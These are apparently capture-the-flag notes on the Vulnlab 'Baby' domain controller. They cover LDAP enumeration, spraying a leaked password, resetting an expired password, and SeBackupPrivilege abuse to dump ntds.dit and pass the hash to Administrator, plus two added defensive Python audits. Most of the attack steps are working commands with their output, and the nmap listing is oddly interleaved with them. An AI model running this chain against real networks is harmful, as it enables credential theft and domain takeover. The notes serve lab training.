Here are my notes on the Baby box from Vulnlab.
BABY: 10.10.75.139
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-25 12:52:11Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
ldapsearch -H ldap://10.10.75.139 -x -W -D "" -b "dc=baby,dc=vl"
[SNIP]
# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Teresa Bell
sn: Bell
description: Set initial password to BabyStart123!
givenName: Teresa
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl
instanceType: 4
whenCreated: 20211121151108.0Z
whenChanged: 20211121151437.0Z
displayName: Teresa Bell
uSNCreated: 12889
memberOf: CN=it,CN=Users,DC=baby,DC=vl
uSNChanged: 12905
name: Teresa Bell
objectGUID:: EDGXW4JjgEq7+GuyHBu3QQ==
userAccountControl: 66080
[SNIP]
Found a password!
description: Set initial password to BabyStart123!
ldapsearch -x -H ldap://10.10.75.139 -D '' -w '' -b "DC=baby,DC=vl" '(objectClass=person)' > ldap-people
ldapsearch -x -H ldap://10.10.75.139 -D '' -w '' -b "DC=baby,DC=vl" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F ": " '{print $2}'
ldapsearch -x -H ldap://10.10.75.139 -D '' -w '' -b "DC=baby,DC=vl" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F ": " '{print $2}' > users.txt
┌──(root㉿kali)-[/home/kali/VULNLAB/BABY/10.10.75.139]
└─# ldapsearch -x -H ldap://10.10.75.139 -D '' -w '' -b "DC=baby,DC=vl" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F ": " '{print $2}'
sAMAccountName
Guest
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinson
┌──(root㉿kali)-[/home/kali/VULNLAB/BABY/10.10.75.139]
└─# ldapsearch -x -H ldap://10.10.75.139 -D '' -w '' -b "DC=baby,DC=vl" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F ": " '{print $2}' > users.txt
┌──(root㉿kali)-[/home/kali/VULNLAB/BABY/10.10.75.139]
└─# cat users.txt
sAMAccountName
Guest
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinson
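The password sitting in Teresa Bell's description field, together with her userAccountControl value (66080 = NORMAL_ACCOUNT | PASSWD_NOTREQD | DONT_EXPIRE_PASSWORD), is exactly what a defender's AD hygiene check should catch before an attacker does. An added Python example of that audit, not part of the original notes, run over constructed LDIF modelled on the ldapsearch output above (the second account is made up for contrast):

```python
import re

# Constructed sample LDIF modeled on the ldapsearch output above (not a live
# query); the second entry is a made-up clean account for contrast.
SAMPLE_LDIF = """\
# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
sAMAccountName: Teresa.Bell
description: Set initial password to BabyStart123!
userAccountControl: 66080

# Hugh George, dev, baby.vl
dn: CN=Hugh George,OU=dev,DC=baby,DC=vl
sAMAccountName: Hugh.George
description: Developer workstation account
userAccountControl: 512
"""
# userAccountControl bits relevant to password hygiene (Microsoft-documented values)
UAC_FLAGS = {0x0020: "PASSWD_NOTREQD", 0x0200: "NORMAL_ACCOUNT", 0x10000: "DONT_EXPIRE_PASSWORD"}
WEAK_FLAGS = ("PASSWD_NOTREQD", "DONT_EXPIRE_PASSWORD")
PASSWORD_HINT = re.compile(r"\b(pass(word|wd)?|pwd|credential)\b", re.IGNORECASE)  # credential-looking text


def parse_ldif(text):
    """One dict per entry; a blank line or '#' comment line ends an entry."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            if current:
                entries.append(current)
            current = {}
            continue
        key, _, value = line.partition(": ")
        current[key] = value
    return entries + ([current] if current else [])


def decode_uac(value):
    """Names of the known userAccountControl bits set in value."""
    return [name for bit, name in UAC_FLAGS.items() if value & bit]


def audit(entries):
    """Flag credential-looking descriptions and weak password flags per account."""
    findings = []
    for entry in entries:
        sam = entry.get("sAMAccountName", entry.get("dn", "?"))
        if PASSWORD_HINT.search(entry.get("description", "")):
            findings.append((sam, "password hint in description"))
        flags = decode_uac(int(entry.get("userAccountControl", "0")))
        findings.extend((sam, flag) for flag in WEAK_FLAGS if flag in flags)
    return findings
```

Against a real directory, feed it the output of the anonymous ldapsearch above; any hit is a finding regardless of whether the password in the description is still valid.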
445/tcp open microsoft-ds?
Credential spray with users.txt and that password: BabyStart123!
┌──(root㉿kali)-[/home/kali/VULNLAB/BABY/10.10.75.139]
└─# crackmapexec smb 10.10.75.139 -u users.txt -p 'BabyStart123!'
SMB 10.10.75.139 445 BABYDC [*] Windows 10.0 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.75.139 445 BABYDC [-] baby.vl\sAMAccountName:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.75.139 445 BABYDC [-] baby.vl\Guest:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.75.139 445 BABYDC [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.75.139 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.75.139 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.75.139 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.75.139 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.75.139 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.75.139 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.75.139 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.75.139 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE #Interesting.
smbpasswd.py Caroline.Robinson:'BabyStart123!'@10.10.75.139 -newpass Password2
smbpasswd.py Caroline.Robinson:'BabyStart123!'@10.10.75.139 -newpass Password2
Impacket v0.11.0 - Copyright 2023 Fortra
===============================================================================
Warning: This functionality will be deprecated in the next Impacket version
===============================================================================
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
Credentials are now Caroline.Robinson:Password2
┌──(root㉿kali)-[/home/kali/VULNLAB/BABY/10.10.75.139]
└─# crackmapexec smb 10.10.75.139 -u Caroline.Robinson -p 'Password2' --shares
SMB 10.10.75.139 445 BABYDC [*] Windows 10.0 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.75.139 445 BABYDC [+] baby.vl\Caroline.Robinson:Password2
SMB 10.10.75.139 445 BABYDC [+] Enumerated shares
SMB 10.10.75.139 445 BABYDC Share Permissions Remark
SMB 10.10.75.139 445 BABYDC ----- ----------- ------
SMB 10.10.75.139 445 BABYDC ADMIN$ READ Remote Admin
SMB 10.10.75.139 445 BABYDC C$ READ,WRITE Default share
SMB 10.10.75.139 445 BABYDC IPC$ READ Remote IPC
SMB 10.10.75.139 445 BABYDC NETLOGON READ Logon server share
SMB 10.10.75.139 445 BABYDC SYSVOL READ Logon server share
┌──(root㉿kali)-[/home/kali/VULNLAB/BABY/10.10.75.139]
└─# crackmapexec winrm 10.10.75.139 -u Caroline.Robinson -p 'Password2'
SMB 10.10.75.139 5985 BABYDC [*] Windows 10.0 Build 20348 (name:BABYDC) (domain:baby.vl)
HTTP 10.10.75.139 5985 BABYDC [*] http://10.10.75.139:5985/wsman
WINRM 10.10.75.139 5985 BABYDC [+] baby.vl\Caroline.Robinson:Password2 (Pwn3d!)
WINRM USER-SHELL !
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-10-25T12:52:58+00:00; -54m09s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2024-07-26T09:03:15
|_Not valid after: 2025-01-25T09:03:15
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-10-25T12:52:18+00:00
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open wsman
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> whoami
baby\caroline.robinson
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> hostname
BabyDC
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> dir
Directory: C:\Users\Caroline.Robinson\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2016 3:36 PM 527 EC2 Feedback.website
-a---- 6/21/2016 3:36 PM 554 EC2 Microsoft Windows Guide.website
-a---- 11/21/2021 3:24 PM 36 user.txt
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> type user.txt
[REDACTED]
USER.TXT: [REDACTED]
PRIV ESC:
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
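Caroline.Robinson's SeBackupPrivilege and SeRestorePrivilege are the whole privilege escalation here, and on a domain controller Windows records every logon that receives such privileges as Security event 4672. An added Python example (not from the original notes) that flags those logons for accounts outside an assumed allowlist, using constructed 4672 message bodies rather than anything captured from the box:

```python
import re

# Constructed sample 4672 ("Special privileges assigned to new logon") messages in
# the Security log's text layout (tabs flattened to spaces); the account names
# follow the box above, nothing here was captured from a live system.
SAMPLE_4672 = [
    """Special privileges assigned to new logon.

Subject:
    Account Name:   Administrator
    Account Domain: BABY
    Logon ID:       0x1A2B3

Privileges:     SeSecurityPrivilege
                SeBackupPrivilege
                SeRestorePrivilege
""",
    """Special privileges assigned to new logon.

Subject:
    Account Name:   Caroline.Robinson
    Account Domain: BABY
    Logon ID:       0x4C5D6

Privileges:     SeBackupPrivilege
                SeRestorePrivilege
""",
]
# Privileges that read or overwrite any file regardless of ACL; on a DC that covers ntds.dit, SAM, SYSTEM.
SENSITIVE = {"SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege", "SeDebugPrivilege"}
# Assumed allowlist of accounts expected to hold them on this DC (tune per environment).
EXPECTED = {"baby\\administrator", "nt authority\\system"}


def parse_4672(message):
    """Extract (domain\\name, [privileges]) from one event 4672 message body."""
    name = re.search(r"Account Name:\s*(\S+)", message).group(1)
    domain = re.search(r"Account Domain:\s*(\S+)", message).group(1)
    tail = message.split("Privileges:", 1)[1]
    return f"{domain}\\{name}".casefold(), re.findall(r"Se\w+Privilege", tail)


def unexpected_privileged_logons(messages, expected=EXPECTED):
    """Accounts outside the allowlist that logged on holding a sensitive privilege."""
    alerts = []
    for message in messages:
        account, privileges = parse_4672(message)
        held = sorted(SENSITIVE & set(privileges))
        if held and account not in expected:
            alerts.append((account, held))
    return alerts
```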
SeBackupPrivilege Priv ESC:
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> dir
Directory: C:\Users\Caroline.Robinson\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/25/2024 1:15 PM 189 script.txt
-a---- 10/25/2024 1:16 PM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 10/25/2024 1:16 PM 16384 SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> type script.txt
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
diskshadow /s script.txt
Copy-FileSeBackupPrivilege e:\Windows\NTDS\ntds.dit C:\Users\Caroline.Robinson\Documents\ntds.dit
reg save hklm\sam C:\Users\Caroline.Robinson\Documents\sam
reg save hklm\system C:\Users\Caroline.Robinson\Documents\system
download ntds.dit
download system
download sam
secretsdump.py -sam sam -system system -ntds ntds.dit LOCAL
secretsdump.py -sam sam -system system -ntds ntds.dit LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b[REDACTED] - WORKS!
[SNIP]
evil-winrm -i 10.10.75.139 -u administrator -H '[REDACTED]'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
baby\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
BabyDC
ADMINISTRATOR SHELL !
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
baby\administrator
*Evil-WinRM* PS C:\Users\Administrator\Desktop> hostname
BabyDC
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/21/2021 3:22 PM 36 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
[REDACTED]
ROOT.TXT: [REDACTED]
9389/tcp open adws
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-10-25T12:52:19
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -54m09s, deviation: 0s, median: -54m10s